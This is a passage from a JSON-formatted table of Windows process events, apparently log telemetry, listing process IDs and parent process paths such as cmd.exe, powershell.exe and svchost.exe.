(4444)\",\"PID: 0x2068 (8296)\",\"PID: 0x11dc (4572)\",\"PID: 0x13e4 (5092)\",\"PID: 0x1524 (5412)\",\"PID: 0x17b0 (6064)\",\"PID: 0x8c4 (2244)\",\"PID: 0x2228 (8744)\",\"PID: 0x1cf0 (7408)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xa90 (2704)\",\"PID: 0x11a8 (4520)\",\"PID: 0x173c (5948)\",\"PID: 0x1910 (6416)\",\"PID: 0x1db4 (7604)\",\"PID: 0x438 (1080)\",\"PID: 0x2018 (8216)\",\"PID: 0x21c8 (8648)\",\"PID: 0x2044 (8260)\",\"PID: 0x2200 (8704)\",\"PID: 0x1124 (4388)\",\"PID: 0xd44 (3396)\",\"PID: 0x1c24 (7204)\",\"PID: 0x1198 (4504)\",\"PID: 0x135c (4956)\",\"PID: 0xd04 (3332)\",\"PID: 0x2364 (9060)\",\"PID: 0x1110 (4368)\",\"PID: 0x994 (2452)\",\"PID: 0x2328 (9000)\",\"PID: 0x6d4 (1748)\",\"PID: 0x20e4 (8420)\",\"PID: 0x1998 (6552)\",\"PID: 0xf54 (3924)\",\"PID: 0x5a8 (1448)\",\"PID: 0x1db8 (7608)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x604 (1540)\",\"PID: 0x1f24 (7972)\",\"PID: 0x518 (1304)\",\"PID: 0x2170 (8560)\",\"PID: 0x12a8 (4776)\",\"PID: 0x200c (8204)\",\"PID: 0xf80 (3968)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xccc (3276)\",\"PID: 0xd7c (3452)\",\"PID: 0x1634 (5684)\",\"PID: 0x1748 (5960)\",\"PID: 0x1898 (6296)\",\"PID: 0x1eb4 (7860)\",\"PID: 0x1468 (5224)\",\"PID: 0x2200 (8704)\",\"PID: 0x1e8c (7820)\",\"PID: 0x2348 (9032)\",\"PID: 0x11f0 (4592)\",\"PID: 0x1f20 (7968)\",\"PID: 0x1480 (5248)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\